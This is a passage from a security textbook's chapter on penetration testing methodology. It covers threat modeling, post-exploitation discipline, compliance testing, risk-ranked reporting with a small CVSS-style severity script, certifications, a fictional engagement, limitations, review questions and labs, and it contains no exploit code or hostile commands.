Between scoping and active testing, professional engagements pause to think like the specific adversary the client fears, which is why PTES places threat modeling as its own phase. Drawing on the methods of Chapter 5 (STRIDE, attack trees, and the MITRE ATT&CK knowledge base), the tester uses the intelligence gathered in reconnaissance to model who would realistically attack this organization, what they would want, and which paths they would take, then prioritizes testing effort accordingly. A bank’s testers focus on paths to financial systems and customer data; a hospital’s on paths to patient records and life-critical devices; a manufacturer’s on intellectual property and operational technology. This adversary-centric prioritization is what makes a time-bounded test efficient: rather than testing everything shallowly, the team concentrates on the attack paths that matter most to this client’s risk profile, ensuring the engagement’s limited hours buy the most relevant assurance. Threat modeling thus links the offensive work of Part III directly back to the risk management of Chapter 5, and it is the bridge between knowing the target (reconnaissance, Chapter 7) and attacking it (Chapters 8 and 9).
6.13 Post-Exploitation, Pivoting, and Operational Discipline#
Gaining access is rarely the end of a test; what an attacker can do after the initial compromise is what truly measures risk, so post-exploitation is a phase in its own right (developed technically in Chapter 9). After the initial foothold, the tester assesses the value of what was reached, attempts privilege escalation to gain administrative or root control, and performs pivoting (also called lateral movement), using the compromised host as a stepping stone to reach systems that were not directly accessible. The goal is to demonstrate realistic business impact: not merely “a web server was vulnerable,” but “from that web server an attacker could reach the domain controller and the customer database.” A well-documented critical path, recording each host, the technique used, and whether it succeeded, turns abstract vulnerabilities into a concrete attack narrative that decision-makers understand.
This phase demands the strictest operational discipline, because the tester is now deep inside live systems. Professionals keep meticulous, time-stamped operational notes (the basis of the report and of any later dispute), run packet captures of their own activity, and encrypt all data they collect or exfiltrate, since it will contain passwords, hashes, and sensitive records. They coordinate continuously with the client’s monitor through daily start-and-end briefings, and they practice deconfliction, so that if the blue team detects suspicious activity, the monitor can confirm whether it is the test or a real attacker. They watch their own systems for “attack-backs” and resource exhaustion, maintain an agreed-upon exemption list to avoid being auto-shunned into a self-inflicted denial of service, and, when the test concludes, remove their artifacts (backdoors, test accounts, uploaded tools) and assist with restoration as the rules of engagement require. This discipline is what keeps an aggressive test safe, attributable, and professional.
Going Deeper (graduate/research): automation, AI, and the future of the discipline
Penetration testing is being reshaped by automation and artificial intelligence on both sides. Automated breach-and-attack-simulation platforms continuously exercise an environment against known techniques, and AI assistants increasingly help with reconnaissance synthesis, payload generation, and report drafting, compressing work that once took days. At the same time, attackers use the same tools, accelerating vulnerability discovery and crafting more convincing social-engineering lures (Chapter 4). These shifts do not eliminate the human tester; they raise the bar for what humans contribute, namely the creativity to chain unexpected flaws, the business judgment to assess real impact, and the ethical and legal discernment that no tool possesses. The research frontier includes autonomous exploitation agents, machine-assisted triage of findings, and the defensive challenge of testing AI systems themselves (prompt injection, model extraction, and data poisoning, revisited in Chapter 17). The enduring lesson is that tooling changes constantly while the methodology, ethics, and legal discipline of this chapter remain the stable foundation on which any technique, automated or manual, must rest.
6.14 Compliance-Driven and Standards-Based Testing#
Much real-world testing is mandated rather than discretionary, so professionals must know which obligations require it. The Payment Card Industry Data Security Standard (PCI DSS) explicitly requires regular penetration testing of the cardholder data environment (its Requirement 11 family), including after significant changes, and requires that the test validate segmentation. Sector regulations drive testing too: the Health Insurance Portability and Accountability Act (HIPAA) Security Rule requires periodic technical evaluation of safeguards; financial regulations and frameworks expect regular assessment; and government systems undergo assessment as part of the NIST Risk Management Framework’s Assess step (Chapter 5). Standards such as ISO/IEC 27001 expect technical vulnerability management and testing as part of the information security management system.
Compliance-driven testing carries distinctive requirements. The scope is often defined by the regulation (for example, everything that stores, processes, or transmits cardholder data), the frequency is mandated (commonly annually and after major changes), and the report must satisfy an auditor as well as the technical team, with explicit attestations and evidence. As Chapter 5 stressed, compliance is a floor, not a ceiling: a test scoped only to satisfy a checklist may miss risks outside the regulated boundary, so mature organizations treat the mandated test as a baseline and pursue broader, risk-driven testing beyond it. Understanding the compliance context is part of scoping, because it determines what must be tested, how often, and how the results must be documented.
6.15 Reporting#
The deliverable that gives a penetration test its value is not the access achieved but the report, because findings that are not communicated clearly cannot be remediated. Throughout the engagement the tester stays in close contact with the client’s monitor, so that the final report contains no surprises; serious issues are discussed as they are found, and a critical vulnerability triggers an immediate pause and notification rather than waiting for the written report. A complete report is comprehensive and self-contained, typically including an introduction, a statement of the work performed, the results and conclusions, and recommendations.
The most important quality of a good report is that its findings are ranked by risk, from highest to lowest, so that the client can address the most dangerous issues first, connecting the test directly to the risk-prioritization logic of Chapter 5. Each finding should describe the vulnerability, demonstrate its impact (often with evidence from the test), assess the risk it poses, and give concrete, actionable remediation guidance. The report is written for two audiences at once: an executive summary conveys business impact and overall posture to decision-makers in non-technical terms, while the technical detail gives administrators what they need to reproduce and fix each issue. Because the report catalogs exactly how to compromise the client, it is extremely sensitive: it must be encrypted in storage and transit, marked confidential, and, by common practice, destroyed by the consultant after a contractually defined period. Finally, good engagements include a post-assessment debrief and, ideally, a retest after remediation to confirm that the fixes work, closing the loop between offense and defense that this chapter opened.
Knowledge Check
Why does a penetration-test report contain both an executive summary and detailed technical findings?
What is the purpose of a retest after remediation?
Answers: (1) The two serve different audiences: the executive summary conveys business impact and posture to decision-makers in non-technical language, while the technical detail gives administrators what they need to reproduce and fix each issue. (2) A retest verifies that the client’s remediation actually closed the vulnerabilities, confirming the fixes work and closing the offense-to-defense loop.
Because the report is the product, its structure rewards attention. A strong report typically opens with an executive summary (the business-level story: overall posture, the most serious risks, and their potential impact, in plain language), followed by a methodology and scope statement (what was tested, how, and when, so the reader knows the boundaries), then the detailed findings (each with a description, affected assets, evidence and reproduction steps, a severity rating such as CVSS, and specific remediation guidance), and finally strategic recommendations and appendices (raw data, tool output, and the operational notes). Findings are ordered by risk so that scarce remediation effort addresses the most dangerous issues first. Good reports also distinguish tactical fixes (patch this server) from strategic ones (improve the patch-management process that left it vulnerable), helping the client address root causes rather than only symptoms. Many engagements track metrics over time, the number and severity of findings across successive tests, to show whether the security program is improving, which connects the report back to the key performance indicators of Chapter 5.
# Chapter 6 -- Ranking findings: a simplified CVSS-style base score
# Real CVSS v3.1 is more detailed; this illustrates how findings are prioritized for the report.
def severity_band(score):
if score == 0: return "None"
if score < 4.0: return "Low"
if score < 7.0: return "Medium"
if score < 9.0: return "High"
return "Critical"
# Illustrative findings with rough base scores (0-10)
findings = [
("Unauthenticated RCE on internet-facing server", 9.8),
("SQL injection in login form", 8.6),
("Reflected XSS in search box", 6.1),
("Missing security headers", 3.7),
("Verbose error messages", 2.4),
]
print(f"{'Finding':48} {'Score':>5} Severity (remediate top-down)")
print("-"*78)
for name, score in sorted(findings, key=lambda x: -x[1]):
print(f"{name:48} {score:>5} {severity_band(score)}")
print("\nReports rank findings by risk so clients fix the most dangerous issues first (Ch.5 logic).")
Finding Score Severity (remediate top-down)
------------------------------------------------------------------------------
Unauthenticated RCE on internet-facing server 9.8 Critical
SQL injection in login form 8.6 High
Reflected XSS in search box 6.1 Medium
Missing security headers 3.7 Low
Verbose error messages 2.4 Low
Reports rank findings by risk so clients fix the most dangerous issues first (Ch.5 logic).
6.16 Professional Certifications for Penetration Testers#
Because the field rewards demonstrated skill, a recognized set of certifications signals competence to employers and clients, and knowing the landscape helps learners chart a path. The most respected hands-on credential is the Offensive Security Certified Professional (OSCP), whose grueling 24-hour practical exam requires actually compromising machines and writing a professional report, making it a strong proxy for real ability. The EC-Council’s Certified Ethical Hacker (CEH) is widely requested in job postings and emphasizes broad methodology knowledge (and maps to this book via Appendix C). The SANS/GIAC GIAC Penetration Tester (GPEN) and GIAC Web Application Penetration Tester (GWAPT) are rigorous, training-backed credentials, and newer practical certifications such as the Practical Network Penetration Tester (PNPT) emphasize realistic, report-driven assessment including Active Directory and social engineering. Higher-level and specialized options include Offensive Security’s advanced tracks and red-team certifications.
These credentials differ in emphasis, hands-on exploitation (OSCP, PNPT), broad knowledge (CEH), or training depth (GPEN), but all reinforce the same professional foundation this chapter describes: methodology, authorization, ethics, and reporting. For learners using this textbook, the offensive chapters (7 through 10) build the technical skills these certifications test, while this chapter supplies the methodological and legal-ethical framing that distinguishes a certified professional from someone who merely knows some tools.
6.17 An End-to-End Engagement, Start to Finish#
To consolidate the chapter, consider a complete engagement for a fictional retailer, “Harbor Goods,” following the process from first contact to final retest. It begins with pre-engagement: Harbor Goods, driven by a PCI DSS obligation and a recent industry breach, requests an external and web-application test. The parties agree the scope (the e-commerce site and its supporting servers, explicitly excluding the third-party payment processor), the knowledge level (gray-box, with a test account provided), permitted vectors (no denial-of-service, social engineering out of scope), the testing window, the testers’ source IP addresses, and a single client monitor empowered to halt the test. All of this is captured in a signed rules-of-engagement document with approval signatures, the authorization that makes everything lawful.
Active work then follows the phases. In reconnaissance (Chapter 7) the testers map Harbor Goods’ public footprint; in scanning (Chapter 8) they enumerate hosts, ports, and services and identify a vulnerable web component; in gaining access (Chapter 9) they exploit a SQL-injection flaw in the login form to retrieve credentials; and in post-exploitation they escalate to an administrative account and pivot to an internal server holding order data, demonstrating that the single web flaw leads to a significant data-exposure path. Throughout, they keep time-stamped operational notes, encrypt collected data, brief the monitor daily, and, on discovering that customer data is reachable, immediately notify the client rather than waiting for the report.
The engagement closes with reporting and remediation. The testers deliver a risk-ranked report whose executive summary explains the business impact (the path from public website to customer data) and whose technical sections give administrators reproduction steps and concrete fixes, with each finding scored by CVSS. They conduct a one-hour debrief, assist in removing their test artifacts, and, after Harbor Goods remediates, perform a retest confirming the SQL-injection flaw and the escalation path are closed. The findings flow into Harbor Goods’ risk register (Chapter 5), and the detection gaps observed inform the blue team (Chapter 12). This single arc demonstrates every concept of the chapter, authorization, methodology, scope, ethics, operational discipline, disclosure, and reporting, working together to convert an authorized attack into measurable security improvement.
6.18 Limitations, Pitfalls, and Misconceptions#
A professional must be candid about what penetration testing cannot do, because overstating its assurance is itself a risk. A test is a snapshot in time: it reflects the systems, configurations, and tester knowledge of a particular window, and a change the next day can introduce a vulnerability the test never saw. It is scope-bounded: anything excluded from the rules of engagement is, by definition, untested, so a clean report covers only what was in scope. It is time- and skill-bounded: real adversaries face no deadline and may be more capable than the testers, so “we did not find a way in” is not “no way in exists.” And it can produce false negatives (missed real vulnerabilities) and false positives (flagged issues that are not exploitable), which is why findings are validated and why automated output is never reported uncritically.
Several recurring pitfalls undermine engagements. Scope creep expands testing into unauthorized territory, creating legal exposure. Inadequate authorization, beginning work before signed permission from someone empowered to grant it, is the cardinal error. Causing unintended damage through aggressive testing without agreed limits can harm the client’s operations and the tester’s reputation. Poor communication, surprising the client with findings or failing to escalate a critical issue immediately, breaches professional duty. Weak reporting that is not risk-ranked or actionable wastes the engagement’s value. And treating compliance as the goal rather than security produces tests scoped only to pass an audit while real risks go unexamined. The remedy for all of these is the discipline this chapter has built: explicit authorization, careful scoping, constant communication, ethical restraint, and a clear, risk-driven report. Understanding the limits is not a weakness of penetration testing but a mark of the professional who uses it correctly, as one valuable input to the continuous risk management of Chapter 5 rather than a one-time guarantee of security.
Chapter Summary#
This chapter opened offensive security by establishing the discipline that makes hacking lawful and useful. A penetration test is an authorized attack that exploits vulnerabilities to validate their severity, distinct from a vulnerability assessment (find and rank, no exploitation) and a red-team engagement (adversary emulation testing detection). Actors are classified by hats (white, gray, black, by authorization and intent) and team colors (red, blue, purple), and engagements by knowledge level (black-, gray-, and crystal/white-box). Tests follow a consistent set of phases, recon, scanning, gaining access, escalation, maintaining access, and post-exploitation validation and cleanup, and, for the ethical tester, permission and reporting, codified by methodologies such as PTES, NIST SP 800-115, and OSSTMM. The most important phase is pre-engagement scoping and the rules of engagement, the document that authorizes and bounds the work and prevents real harm. The legal framework (the CFAA and related statutes, narrowed by Van Buren) and professional ethics make authorization and the client’s welfare paramount, while coordinated vulnerability disclosure and bug bounties, now supported by DOJ good-faith-research policy, govern findings made outside a contract. Testers work from managed platforms like Kali Linux under strict operational discipline, and the engagement’s value is delivered through a risk-ranked report and retest. With the methodology, law, and ethics in place, the next chapter begins the technical work with reconnaissance, the first phase of every engagement.
Why This Matters#
Penetration testing is where the offensive and defensive halves of this book meet. It is the disciplined practice of thinking like the attackers of Chapter 1, using the techniques of Chapters 7 through 10, in order to feed the risk management of Chapter 5 and strengthen the defenses of Chapters 11 and 12. What makes it a profession rather than a crime is everything this chapter emphasized around the technical skills: a repeatable methodology, a carefully scoped and signed rules-of-engagement document, a firm grasp of the law, an ethical commitment to the client’s welfare, responsible disclosure of what is found, and a clear, risk-ranked report that drives remediation. A brilliant exploit delivered without authorization is a felony; the same exploit delivered within these structures is a valuable service. Mastering the methodology and its surrounding discipline is therefore the prerequisite for everything that follows, and it is what employers and certifications from CEH to OSCP ultimately test.
Review Questions (MCQ)#
Q1. The single factor that distinguishes a penetration test from a crime is: A. The tools used B. Authorization C. The operating system D. The attacker’s skill
Q2. A vulnerability assessment differs from a penetration test in that it usually: A. Exploits every flaw B. Identifies and ranks flaws without exploiting them C. Is illegal D. Needs no scope
Q3. A hacker who acts without authorization but without malicious intent is a: A. White hat B. Gray hat C. Black hat D. Red hat
Q4. Testing with full knowledge of the target (source code, architecture) is called: A. Black-box B. Gray-box C. White-box (crystal-box) D. Blind
Q5. The purple team’s role is to: A. Attack only B. Defend only C. Have red and blue collaborate to improve detection D. Audit policy
Q6. The most important pre-engagement document, which authorizes and bounds the test, is the: A. Final report B. Rules of engagement C. Invoice D. CVE entry
Q7. Which methodology defines seven phases including pre-engagement, threat modeling, exploitation, and reporting? A. OWASP B. PTES C. ISO 9001 D. COBIT
Q8. The principal U.S. anti-hacking statute is the: A. DMCA B. HIPAA C. CFAA (18 U.S.C. 1030) D. GDPR
Q9. Van Buren v. United States (2021) is significant because it: A. Banned bug bounties B. Narrowed “exceeds authorized access” under the CFAA C. Legalized all hacking D. Created the CVE system
Q10. Reporting a flaw privately to the vendor and allowing time to fix before publishing is: A. Full disclosure B. Non-disclosure C. Responsible/coordinated disclosure D. Zero-day sale
Q11. During a test, discovering a critical vulnerability should prompt the tester to: A. Keep testing quietly B. Publish it immediately C. Stop and immediately notify the client D. Exploit it fully
Q12. Scope creep refers to: A. Slow scanners B. Testing expanding beyond what was authorized C. A type of malware D. A reporting format
Q13. Kali Linux is the modern successor to which testing distribution? A. Ubuntu B. BackTrack C. Windows D. Red Hat
Q14. A penetration-test report’s findings should be ordered: A. Alphabetically B. By discovery time C. Ranked by risk, highest first D. Randomly
Q15. Good-faith security research under recent DOJ policy must: A. Be done for profit B. Avoid harm and aim to improve security, not extort C. Skip authorization D. Always be published immediately
Answer Key#
1: B 2: B 3: B 4: C 5: C 6: B 7: B 8: C 9: B 10: C 11: C 12: B 13: B 14: C 15: B
Lab Assignment#
Lab 6.1 (beginner) - Write rules of engagement. For a fictional client, draft a one-to-two page RoE including concept of operations, scope (in- and out-of-scope targets), permitted attack vectors, the client monitor and contact procedure, handling of critical findings, data handling, and approval signatures. Identify three things that, if omitted, could cause legal or operational harm.
Lab 6.2 (beginner/intermediate) - Classify the engagement. Given three short scenarios (an external test of a public website with no information provided; an assessment of an internal app with user credentials supplied; a source-code-assisted review), classify each by knowledge level and team type, and justify which methodology phase the work begins in.
Lab 6.3 (intermediate) - Build a lab and run the full process. Using the Section 6.11 exercise lab, take one vulnerable target through the phases (recon, scan, gain access) and keep time-stamped operational notes. Produce a short risk-ranked report with an executive summary and one detailed finding, applying the CVSS-style scoring from this chapter.
Lab 6.4 (advanced/research) - Disclosure and the law. Choose a real public bug-bounty or vulnerability disclosure program and summarize its safe-harbor terms, scope, and rules. Then write a short memo explaining, with reference to the CFAA, Van Buren, and DOJ good-faith-research policy, why participating within those terms is lawful and what actions would fall outside protection.
References#
Penetration Testing Execution Standard (PTES). http://www.pentest-standard.org
National Institute of Standards and Technology. Technical Guide to Information Security Testing and Assessment, NIST SP 800-115, 2008.
Institute for Security and Open Methodologies. OSSTMM: Open Source Security Testing Methodology Manual.
Harris, S., et al. Gray Hat Hacking: The Ethical Hacker’s Handbook. McGraw-Hill.
U.S. Department of Justice. Policy for Charging Cases under the Computer Fraud and Abuse Act, 2022 (and subsequent guidance).
Supreme Court of the United States. Van Buren v. United States, 593 U.S. ___ (2021).
(ISC)2 Code of Ethics; EC-Council Code of Ethics.
FIRST. Common Vulnerability Scoring System (CVSS) v3.1 Specification.
Related work by the author (see Appendix E):
Hayes, N., Komi, J., Trivedi, D. (2026). Agentic Artificial Intelligence for Offensive Capture-the-Flag Challenges: Design, Ethical Boundaries, and Security Evaluation. (see Appendix E)
Trivedi, D. (2026). CTF Guide with PLC Security. (see Appendix E)